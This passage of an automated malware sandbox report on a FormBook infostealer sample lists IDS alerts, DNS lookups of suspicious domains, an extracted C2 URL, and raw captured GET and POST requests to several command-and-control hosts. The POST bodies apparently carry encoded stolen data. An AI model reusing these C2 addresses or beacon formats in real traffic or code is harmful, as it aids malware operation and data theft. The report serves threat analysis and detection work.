Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49968 -> 134.122.201.217:80
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.brandpay.xyz
Source: C:\Windows\explorer.exe DNS query: www.liveafunday.xyz
Source: C:\Windows\explorer.exe DNS query: www.siberup.xyz
Source: C:\Windows\explorer.exe DNS query: www.o7oiwlp.xyz
Source: DNS query: www.o7oiwlp.xyz
Source: DNS query: www.liveafunday.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.gafcbooster.com/np8s/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: COMING-ASABCDEGROUPCOMPANYLIMITEDHK COMING-ASABCDEGROUPCOMPANYLIMITEDHK
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=hgAcLcCQcJ9fw2P/Tuk0sK1oy/IuL6u1zsG1wPPsT2rq6CikgixxXMntvJFJ21PsUjiZ&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.brandpay.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=SjFSW0qH8X1Gu/+4r88YNPSLQa2KKx1h4LPt291Cc0nRXdmgbio7b0swgPTE4uOj94VU&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.brawlhallacodestore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEPodkGcNW4yt&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.topings33.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=z2yIa7cx1SROgCPUWMRj7QFmCzRewXUzLnClNkjkn7TUjkjwrW0kK9KMlL9EtH2oI1i9&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.liveafunday.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=cDXfWuCokJFrdCwhVntnDB+RdogU7uBP5U/Sv42Lexzi+FyRpCsvSOHB1ClRHn4SxuGj&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.siberup.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=vlrq3Iq6CNBS64Mt3AOFKZFqCoQQX/EcbdCgZyJL/t2S6EN96XJkdyy29bgYyDpdikhs&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.kishanshree.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=vlrq3Iq6CNBS64Mt3AOFKZFqCoQQX/EcbdCgZyJL/t2S6EN96XJkdyy29bgYyDpdikhs&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.kishanshree.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=vlrq3Iq6CNBS64Mt3AOFKZFqCoQQX/EcbdCgZyJL/t2S6EN96XJkdyy29bgYyDpdikhs&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.kishanshree.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=pvCvVC1srqMzTu3vjZ/Pi4S7puQ7WYlroZs2vwEH9SE4BkgUF4SEMyF7QpXUX37idvZ6&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.rasheedabossmoves.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=Wi2RbeLHGdcMG/4zbWZrHjxVNTurLVF13zSFjScR2hfe23jELpoygCvTVMXCwbd5YdLw&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.o7oiwlp.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=OAQ8ZAk71VYHsoGBQeS0cLLvyBMKMlAsSK0ta2CkcQgnl+jMatCDHwZEkCDKr1q9/u4Y&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.ratebill.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=SaZV+ETfGqRGg8UpLQ9gT5lpaRa7t1Wyj9mLK06zGilC1KjP8kiErJAXediVB/P9DJGG&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.2264a.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=sGHpREHB6zr3UC4aQViiUpNRv9hYNnMtmn0rCl8QdyZ+urDz6JFWhhwh7EVf+dC28syJ&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.heavymettlelawyers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=O5u6OlqxnDtTF3riQ4xVZIWxoHxK/fTzbXBC76K0hST926FmxCw4JGrgecy53rLpUaVG&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.interlink-travel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?Bl=lHUDzXfpVJ_&c2MH6DeP=O5u6OlqxnDtTF3riQ4xVZIWxoHxK/fTzbXBC76K0hST926FmxCw4JGrgecy53rLpUaVG HTTP/1.1Host: www.interlink-travel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?Bl=lHUDzXfpVJ_&c2MH6DeP=Wi2RbeLHGdcMG/4zbWZrHjxVNTurLVF13zSFjScR2hfe23jELpoygCvTVMXCwbd5YdLw HTTP/1.1Host: www.o7oiwlp.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEPodkGcNW4yt&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.topings33.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?Bl=lHUDzXfpVJ_&c2MH6DeP=z2yIa7cx1SROgCPUWMRj7QFmCzRewXUzLnClNkjkn7TUjkjwrW0kK9KMlL9EtH2oI1i9 HTTP/1.1Host: www.liveafunday.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=Wi2RbeLHGdcMG/4zbWZrHjxVNTurLVF13zSFjScR2hfe23jELpoygCvTVMXCwbd5YdLw&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.o7oiwlp.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?c2MH6DeP=OAQ8ZAk71VYHsoGBQeS0cLLvyBMKMlAsSK0ta2CkcQgnl+jMatCDHwZEkCDKr1q9/u4Y&hFQL=JXUhrvXxUhF4 HTTP/1.1Host: www.ratebill.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 160.153.136.3 160.153.136.3
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.liveafunday.xyzConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.liveafunday.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.liveafunday.xyz/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 32 4d 48 36 44 65 50 3d 38 30 47 79 45 65 41 62 30 69 74 45 28 79 79 55 45 61 45 58 76 6b 68 67 42 43 35 79 79 46 73 6f 50 48 47 74 62 6c 7a 6d 6d 37 37 55 6b 31 37 59 76 46 31 4d 5a 61 4c 57 32 35 56 70 68 6b 79 6e 51 31 7a 50 39 59 5a 44 6a 45 64 7a 31 42 4e 58 54 68 6c 31 58 6f 72 41 43 70 30 6b 68 61 52 56 30 56 51 56 73 66 4d 56 61 75 4f 6a 45 36 4d 71 34 6f 67 69 55 31 59 59 72 4c 69 78 50 4e 39 6b 54 33 49 43 30 4e 6e 72 4c 31 61 36 6a 62 55 53 61 6e 70 6b 55 52 54 56 5a 6c 37 32 75 39 64 45 79 51 78 65 4a 31 46 65 79 58 4a 51 75 73 4b 4d 37 33 43 4a 45 31 47 48 42 63 44 36 45 67 78 69 68 52 6f 6d 44 4a 52 33 30 30 4d 65 58 31 38 77 32 30 5a 59 43 47 77 37 72 45 61 69 6a 58 41 44 71 76 58 61 77 30 6b 58 39 6b 35 68 79 5a 75 6f 6a 33 28 68 42 38 6f 6c 41 49 66 33 38 36 4b 32 57 48 48 4c 68 73 33 68 72 47 51 48 73 44 64 44 58 5f 4e 32 51 36 4b 5a 43 54 30 66 50 62 76 68 56 4f 48 4e 61 74 6d 63 32 62 28 44 54 34 53 47 58 7a 30 5f 69 65 77 6d 38 4c 7a 58 51 41 79 7a 66 72 4c 41 33 78 53 35 33 4c 67 4e 38 5a 63 78 44 6d 69 68 56 65 75 42 41 6f 7a 4d 52 33 78 4a 35 71 6c 6a 33 6b 36 45 4f 35 77 46 53 79 61 4a 6c 7a 34 4b 67 74 61 4f 50 37 79 59 35 49 35 6c 6d 5a 43 65 62 54 39 53 42 32 46 55 51 4c 77 4f 79 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: c2MH6DeP=80GyEeAb0itE(yyUEaEXvkhgBC5yyFsoPHGtblzmm77Uk17YvF1MZaLW25VphkynQ1zP9YZDjEdz1BNXThl1XorACp0khaRV0VQVsfMVauOjE6Mq4ogiU1YYrLixPN9kT3IC0NnrL1a6jbUSanpkURTVZl72u9dEyQxeJ1FeyXJQusKM73CJE1GHBcD6EgxihRomDJR300MeX18w20ZYCGw7rEaijXADqvXaw0kX9k5hyZuoj3(hB8olAIf386K2WHHLhs3hrGQHsDdDX_N2Q6KZCT0fPbvhVOHNatmc2b(DT4SGXz0_iewm8LzXQAyzfrLA3xS53LgN8ZcxDmihVeuBAozMR3xJ5qlj3k6EO5wFSyaJlz4KgtaOP7yY5I5lmZCebT9SB2FUQLwOyg).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.liveafunday.xyzConnection: closeContent-Length: 36482Cache-Control: no-cacheOrigin: http://www.liveafunday.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.liveafunday.xyz/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 32 4d 48 36 44 65 50 3d 38 30 47 79 45 62 70 43 37 79 42 5a 6e 43 7e 33 51 49 45 44 37 46 78 69 4e 53 39 78 33 45 42 34 59 43 62 63 56 45 44 62 6e 2d 50 65 7a 57 50 31 6b 6d 46 69 5a 62 37 5f 36 71 78 74 72 55 4f 6b 51 31 37 78 39 59 56 44 67 45 31 6a 77 53 30 36 54 43 4e 30 56 49 72 38 42 70 30 48 6c 59 6c 34 30 56 63 37 73 66 45 46 5a 66 79 6a 47 66 49 71 36 72 49 58 61 31 59 61 31 62 79 74 4c 4e 78 44 54 33 77 61 30 49 66 72 4c 46 57 36 6a 34 4d 52 63 6c 42 72 54 42 54 55 53 46 36 79 67 64 59 33 79 51 31 38 4a 77 6c 65 79 68 78 51 68 59 47 4d 77 67 57 4b 64 56 47 34 46 63 44 4e 41 67 39 4a 68 52 6b 51 44 4c 39 4e 30 42 45 65 57 46 38 7a 7a 6e 70 68 46 52 73 57 34 55 47 5f 6a 58 4e 70 72 2d 4c 38 77 77 31 30 70 6d 77 58 73 4c 58 48 6a 31 7a 50 44 63 6f 68 5a 34 66 57 38 36 4b 57 57 48 48 70 68 74 6e 68 72 42 4d 48 74 67 31 44 41 75 4e 78 66 36 4b 51 4c 7a 31 4d 41 37 72 64 56 4f 50 64 61 70 71 36 32 71 37 44 53 5a 69 47 55 42 4d 38 33 4f 78 74 34 4c 79 42 61 67 79 47 66 72 4c 70 33 30 71 70 32 34 55 4e 36 4c 30 78 41 43 43 68 46 2d 75 42 5a 59 7a 4f 61 58 38 43 35 71 74 6e 33 68 7e 2d 4f 4b 63 46 52 6b 47 4a 72 78 41 4b 6a 64 61 4f 43 62 7a 74 32 59 73 71 6d 59 37 75 59 79 52 37 50 78 41 5f 61 62 68 4b 68 62 7a 67 7a 46 34 76 59 6b 54 56 54 79 42 50 59 55 64 4d 35 64 6c 5a 52 6c 37 45 43 64 34 6a 51 50 74 4c 53 58 42 4b 78 45 65 38 71 66 79 64 4e 69 38 72 70 44 35 54 33 66 79 56 4e 38 42 38 38 31 30 34 4c 30 30 5a 6e 66 65 6f 50 6f 79 66 63 72 37 65 4d 36 45 4d 56 5f 6b 68 71 58 32 36 6f 6b 7e 53 36 45 33 35 50 75 67 61 75 74 30 44 7a 68 63 79 64 56 47 55 74 68 31 68 6a 35 4d 6e 47 41 65 44 6f 58 7e 58 58 74 6d 52 41 6b 49 36 46 63 55 62 33 55 39 78 34 67 78 74 67 77 70 73 6a 6b 52 5a 76 76 62 49 6d 68 4a 73 61 67 75 4f 4f 39 67 66 4f 39 67 58 69 38 64 47 39 4c 33 30 6f 5a 36 34 31 65 55 69 4e 58 53 4c 39 6e 72 6f 77 7a 78 32 6e 58 6f 37 42 44 6c 72 28 72 5a 52 6d 4d 67 74 77 72 77 6c 41 5f 75 6f 4d 5a 36 34 71 2d 78 32 70 43 78 4f 46 48 45 32 57 78 77 42 74 62 69 6d 4f 66 32 51 45 49 62 34 59 41 53 50 39 6d 30 6a 62 5f 67 33 36 51 4e 69 4a 4a 34 5a 4a 37 66 56 6b 35 4f 71 33 62 56 76 4e 68 6b 6c 57 71 6c 6f 32 43 62 4a 62 68 72 44 71 36 42 31 63 2d 73 55 78 44 30 49 33 4e 72 57 70 56 67 4d 36 68 31 4b 56 66 31 52 48 49 6a 53 71 78 64 63 73 31 56 61 41 58 4a 61 35 6f 4d 57 61 6c 59 76 37 53 77 6a 51 51 71 37 4c 68 6c 70 34 78 34 44 4c 45 30 73 50 49 67 70 4b 67 31 6f 4c 73 59 42 56 64 66 4a 65 2d 50 54 54 70 70 78 66 75 37 37 7e 42 4d 33 42 64 79 4b 6c 32 39 39 56 59 79 42 6b 6b 37 73 71 5f 50 61 4e 4a 5a 58 76 6c 70 6c 41 65 38 41 34 69
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.siberup.xyzConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.siberup.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.siberup.xyz/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 32 4d 48 36 44 65 50 3d 54 42 6a 6c 49 4a 43 7a 76 72 46 6c 48 44 46 71 44 41 63 48 44 58 65 58 65 4c 38 31 73 66 78 51 69 68 4b 71 32 4a 6a 49 56 68 44 33 37 6d 66 41 70 79 41 35 66 72 6e 43 32 53 52 33 4e 6d 6b 68 35 38 6a 34 50 53 58 42 5a 71 6f 2d 6e 54 44 61 4b 51 64 4c 72 69 34 53 47 38 72 37 75 58 72 56 4d 57 50 66 6f 4f 64 2d 30 4a 5a 48 47 6c 62 58 51 39 33 67 7a 4e 43 32 41 63 59 6e 62 6f 4e 6c 6d 56 7e 4b 6a 49 7a 47 48 7a 59 4d 77 45 30 68 44 50 6d 7a 35 71 65 5f 6f 66 58 69 42 56 76 79 52 5f 65 6f 57 48 55 31 41 58 37 43 35 49 4a 36 73 53 61 38 77 48 46 6f 42 58 67 35 57 5f 44 53 6f 73 69 78 6f 57 31 38 5a 54 69 6e 6e 48 73 48 34 62 51 53 54 58 4c 38 55 42 4a 6e 67 65 56 55 68 38 43 56 76 45 7a 36 31 63 32 44 75 62 75 6e 36 4a 44 72 65 63 43 4a 67 64 49 4b 57 61 63 53 72 51 6c 34 67 6d 41 61 36 46 76 6a 47 49 69 62 70 68 62 62 58 57 56 55 73 66 69 51 33 37 76 58 41 38 4d 42 4a 34 7a 57 5a 50 6e 59 39 73 73 46 4b 51 57 4c 31 35 73 50 64 51 62 76 61 62 4f 42 67 65 67 50 58 51 70 52 34 6b 36 6d 31 6e 49 59 44 58 6b 50 68 4c 6a 4a 58 45 59 45 33 2d 74 4c 48 6d 42 79 57 31 28 63 5a 31 6a 74 69 71 31 6b 4e 56 41 71 77 48 36 76 6a 35 7a 64 78 67 46 49 72 5f 4a 61 63 32 61 66 36 66 39 56 36 30 58 32 67 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: c2MH6DeP=TBjlIJCzvrFlHDFqDAcHDXeXeL81sfxQihKq2JjIVhD37mfApyA5frnC2SR3Nmkh58j4PSXBZqo-nTDaKQdLri4SG8r7uXrVMWPfoOd-0JZHGlbXQ93gzNC2AcYnboNlmV~KjIzGHzYMwE0hDPmz5qe_ofXiBVvyR_eoWHU1AX7C5IJ6sSa8wHFoBXg5W_DSosixoW18ZTinnHsH4bQSTXL8UBJngeVUh8CVvEz61c2Dubun6JDrecCJgdIKWacSrQl4gmAa6FvjGIibphbbXWVUsfiQ37vXA8MBJ4zWZPnY9ssFKQWL15sPdQbvabOBgegPXQpR4k6m1nIYDXkPhLjJXEYE3-tLHmByW1(cZ1jtiq1kNVAqwH6vj5zdxgFIr_Jac2af6f9V60X2gA).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.siberup.xyzConnection: closeContent-Length: 36482Cache-Control: no-cacheOrigin: http://www.siberup.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.siberup.xyz/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 32 4d 48 36 44 65 50 3d 54 42 6a 6c 49 49 7e 70 69 34 42 4f 4e 7a 35 5a 45 7a 73 54 58 30 47 56 62 34 51 36 77 4b 34 49 6f 77 61 59 72 5a 79 70 62 45 47 6d 78 32 43 69 34 68 78 6d 66 75 43 55 75 51 31 7a 61 57 6f 69 35 38 71 70 50 53 62 42 61 72 77 51 67 79 53 39 4b 79 6c 45 6f 43 34 69 4a 63 71 6c 34 6a 69 48 4d 57 4b 49 6f 4f 55 6d 33 38 46 48 55 32 7a 58 62 61 6a 72 39 4e 44 39 4e 38 49 37 57 4a 78 53 6d 56 6e 50 6a 4b 33 47 47 44 45 4d 78 6b 45 6d 42 49 4b 30 6a 4b 66 33 74 66 58 37 54 56 72 6d 52 5f 61 57 57 47 34 31 41 6b 50 43 35 63 46 36 35 52 43 5f 6f 6e 46 70 51 6e 67 34 53 5f 4f 63 6f 73 7e 39 6f 55 59 48 61 68 7e 6e 39 58 73 47 72 5a 77 61 58 41 28 76 59 68 4d 31 67 66 6f 49 68 70 6a 47 76 46 4f 66 7a 75 65 34 72 34 58 49 36 4c 75 6c 62 38 43 46 34 4e 49 72 57 61 63 55 72 51 6c 6e 67 6d 51 61 36 47 50 6a 48 72 61 62 75 45 76 61 59 57 56 56 31 76 6a 46 76 62 71 6b 41 38 46 65 4a 35 61 7a 65 34 33 59 38 4a 51 46 4b 6a 4f 4d 35 5a 73 4a 5a 51 61 37 50 72 4f 65 67 65 67 58 58 56 56 37 34 54 53 6d 30 79 38 59 46 78 59 50 6b 37 6a 4a 4a 30 59 47 74 4f 52 62 48 6d 4a 32 57 78 37 6d 5a 43 62 74 6a 37 56 6b 4a 45 41 71 30 33 36 76 36 70 7a 4f 68 43 67 46 39 74 70 69 61 57 7e 4e 30 37 67 32 73 46 32 6d 28 34 39 5a 74 43 32 51 64 79 68 42 66 4a 39 38 44 61 77 6f 67 47 4f 79 6f 42 67 69 72 62 4a 41 79 63 4d 55 6f 78 47 76 6b 69 61 54 4f 4d 30 55 35 4e 68 52 69 68 69 41 72 6b 54 48 32 41 7a 71 4c 36 6d 6b 66 43 66 35 58 47 35 48 4c 79 75 4d 44 54 68 6c 6d 50 39 63 4f 51 76 6e 55 57 28 6d 65 4e 30 62 32 56 72 4a 76 5f 6e 44 4a 75 5a 74 34 64 69 52 48 49 70 56 53 73 6d 56 70 5f 33 53 78 2d 62 46 39 35 45 55 74 6c 76 4d 6b 68 41 5f 5a 47 77 4a 57 68 53 56 62 73 43 54 52 61 7a 6c 4d 39 51 46 68 38 54 66 4d 30 50 43 41 47 42 51 62 4c 70 75 69 4c 31 47 45 4d 49 6b 67 4a 67 77 61 68 7e 62 6d 75 38 57 68 5a 42 62 45 57 4a 6d 75 57 6b 51 5a 4c 6b 77 79 72 59 64 34 55 48 43 6e 65 7a 64 35 55 4f 35 68 6f 4e 66 6a 46 44 71 65 54 52 4e 74 43 62 70 77 67 78 6c 44 6c 70 79 34 57 64 2d 30 32 53 53 64 4b 37 35 75 64 70 4a 5a 43 7a 49 52 76 4f 71 4d 72 78 71 31 32 70 74 32 53 48 75 46 75 54 57 57 65 7a 33 4a 37 68 67 32 4c 5a 36 6c 74 56 75 38 79 35 4b 6b 79 72 59 73 31 68 56 38 74 41 54 59 6d 35 58 71 4f 54 61 68 74 61 4e 4c 61 70 36 71 4f 4d 37 6d 75 4a 34 6e 63 6c 50 4a 71 5a 75 6c 76 76 5f 28 6b 46 42 6a 31 7e 69 38 64 63 6b 55 6e 69 2d 56 5f 4f 74 73 55 46 66 61 46 5a 61 49 51 37 34 4f 30 70 6b 4d 77 49 4e 63 37 71 52 7a 67 76 53 77 56 68 6e 76 6f 4a 69 68 64 53 64 79 5a 74 75 70 38 67 2d 75 38 45 4d 53 4f 63 4d 5a 41 31 32 65 61 54 63 32 45 59 4d 52 30 59 58 39 37
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.kishanshree.comConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.kishanshree.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kishanshree.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 32 4d 48 36 44 65 50 3d 67 6e 66 51 70 6f 61 42 4b 75 64 35 39 2d 34 68 71 6e 76 68 58 4a 6c 4d 41 4c 38 5a 5a 4d 34 6e 42 64 69 6f 66 6a 59 49 35 64 57 74 31 33 39 69 31 6d 49 4d 55 45 6a 36 69 72 56 6f 75 53 70 55 72 32 49 32 6e 66 4c 44 6d 6a 75 4a 6b 59 6b 53 31 48 63 44 4d 52 4b 6a 46 31 38 42 6a 42 58 73 6f 63 6a 53 41 6c 79 64 63 62 74 47 68 72 68 61 4a 52 56 4f 59 6b 41 70 4d 45 28 50 68 79 6d 46 63 50 73 6f 57 68 6e 73 51 61 67 51 37 35 36 4f 6c 4e 51 6a 57 56 35 45 4f 59 49 46 70 62 74 54 49 4a 6a 76 30 33 39 46 4b 4c 45 54 38 35 6a 4e 7a 33 74 31 50 6d 6f 7a 71 5f 7a 44 72 43 46 70 6f 35 6d 76 65 38 6b 47 50 79 43 5f 64 79 78 43 46 53 75 67 4a 38 31 41 4a 31 6e 4c 6e 68 55 33 49 72 33 77 4f 77 33 44 34 41 58 41 55 68 4e 61 7e 67 4c 52 37 44 57 75 48 74 6b 7a 5a 45 43 66 78 67 72 32 41 72 52 77 41 41 64 66 45 33 77 4f 66 31 63 58 61 39 4e 4d 72 6b 79 35 44 41 37 57 79 66 39 58 51 59 6e 6b 75 62 64 70 37 41 39 6f 6b 6b 79 71 77 54 46 4b 65 31 28 65 51 76 6e 72 32 4f 4f 4d 32 35 73 6a 38 5a 63 75 75 70 71 4d 4c 70 39 6f 61 56 7e 6c 33 31 4e 36 38 5a 7a 77 5a 79 79 48 4d 63 45 53 54 58 69 41 65 69 62 74 4f 49 69 6f 6b 42 5a 63 37 54 49 70 54 64 64 44 73 6d 41 74 57 4a 6a 70 4b 68 4c 7a 58 43 48 38 70 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: c2MH6DeP=gnfQpoaBKud59-4hqnvhXJlMAL8ZZM4nBdiofjYI5dWt139i1mIMUEj6irVouSpUr2I2nfLDmjuJkYkS1HcDMRKjF18BjBXsocjSAlydcbtGhrhaJRVOYkApME(PhymFcPsoWhnsQagQ756OlNQjWV5EOYIFpbtTIJjv039FKLET85jNz3t1Pmozq_zDrCFpo5mve8kGPyC_dyxCFSugJ81AJ1nLnhU3Ir3wOw3D4AXAUhNa~gLR7DWuHtkzZECfxgr2ArRwAAdfE3wOf1cXa9NMrky5DA7Wyf9XQYnkubdp7A9okkyqwTFKe1(eQvnr2OOM25sj8ZcuupqMLp9oaV~l31N68ZzwZyyHMcESTXiAeibtOIiokBZc7TIpTddDsmAtWJjpKhLzXCH8pA).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.kishanshree.comConnection: closeContent-Length: 36482Cache-Control: no-cacheOrigin: http://www.kishanshree.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kishanshree.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 32 4d 48 36 44 65 50 3d 67 6e 66 51 70 74 36 58 4f 66 77 74 6c 4c 68 48 70 55 66 50 63 5a 31 53 4e 62 49 47 58 75 4d 4f 47 70 48 5a 43 53 70 70 7e 59 79 33 28 6e 68 66 7e 45 34 69 55 46 54 54 76 35 78 33 28 69 6c 54 72 32 51 55 6e 66 50 44 70 44 47 5a 6b 35 30 34 31 69 6f 45 42 52 4b 66 45 31 38 45 6e 44 79 4f 6f 63 6d 33 41 6b 33 41 64 72 52 47 75 70 5a 61 4c 53 39 46 62 45 42 69 50 45 76 62 76 53 36 63 63 50 45 4f 57 6c 6e 73 58 71 73 51 36 61 69 4e 6a 4d 51 38 53 46 35 63 66 6f 49 51 77 4c 6f 6b 49 4a 6e 4e 30 32 42 46 4c 35 77 54 38 6f 44 4e 30 47 74 79 42 32 6f 32 6f 50 7a 4b 68 69 5a 43 6f 35 37 39 65 39 67 57 50 44 6d 5f 50 79 78 44 42 44 32 47 4d 72 67 41 46 55 6a 73 6e 68 6f 65 4c 36 72 6f 4f 79 69 51 73 44 50 52 4e 77 68 38 7e 69 48 33 33 44 57 71 4d 4e 6c 78 5a 45 44 2d 78 67 72 55 41 72 42 77 41 44 39 66 46 56 49 4f 58 77 6f 51 52 39 4e 4a 79 30 79 68 65 51 33 75 79 66 6c 48 51 61 6e 4b 75 49 78 70 70 30 35 6f 6a 57 61 70 34 7a 46 49 61 31 7e 43 62 50 6d 6c 32 4f 4f 69 32 38 41 7a 28 76 59 75 76 34 71 4d 4c 4b 46 6f 59 6c 7e 6c 70 6c 4d 38 33 35 7e 31 5a 79 71 44 4d 65 63 6f 53 67 43 41 65 77 6a 74 4f 74 65 6f 6e 78 5a 63 76 6a 4a 78 43 38 74 4e 67 48 41 4f 46 37 43 56 66 58 79 32 58 53 4b 6b 39 32 7a 55 4c 70 37 79 53 69 32 67 52 4b 54 43 41 5f 75 47 6e 51 74 65 62 53 52 41 66 74 74 45 43 5a 62 67 79 58 44 34 6d 6b 72 45 6e 36 61 2d 35 65 34 78 28 67 62 6d 62 77 37 4b 48 48 49 6b 43 67 78 52 70 5a 51 39 30 55 69 51 75 34 71 7a 31 41 5a 4d 6c 2d 65 4a 75 52 58 61 47 2d 34 59 4d 34 56 39 68 78 41 79 77 66 71 75 76 78 51 6e 44 50 37 69 66 79 51 67 73 52 43 48 45 4c 30 32 6b 4e 61 33 77 6a 30 7a 41 66 64 5f 64 56 65 2d 7a 6e 53 35 46 70 52 49 72 6b 42 6d 63 6d 6d 32 34 35 46 30 56 55 76 32 63 47 68 5f 38 37 57 36 43 74 63 4f 55 4d 63 56 42 65 6d 64 66 54 58 76 67 45 68 4f 55 54 76 4d 74 4f 79 4b 72 78 54 4f 4c 75 6e 32 39 74 48 72 6e 7a 6a 4a 63 59 39 32 4b 55 61 4b 6e 4e 62 75 48 4a 52 53 57 53 4c 49 43 66 37 75 65 77 6e 45 70 6e 32 6c 4d 54 32 30 4d 65 58 67 6b 62 6c 75 78 77 57 54 4d 39 78 31 30 56 28 67 62 43 53 49 43 74 43 6b 38 63 30 7a 30 57 76 64 28 4a 6b 66 75 69 55 55 6d 42 4f 7a 6b 55 50 55 4b 79 4d 35 68 78 6b 33 6a 64 75 49 72 58 54 4a 34 53 6b 58 50 71 28 38 54 45 76 59 71 72 48 7a 69 33 6b 51 32 4e 47 73 6c 55 39 4b 45 70 33 69 48 4e 28 5a 78 67 69 61 4b 42 55 6a 71 59 72 71 35 48 6c 4d 6f 64 74 52 33 51 47 58 4b 63 62 41 66 5f 74 57 38 32 62 7a 6e 58 48 4a 42 70 73 50 5a 6f 4b 6c 76 6b 6f 39 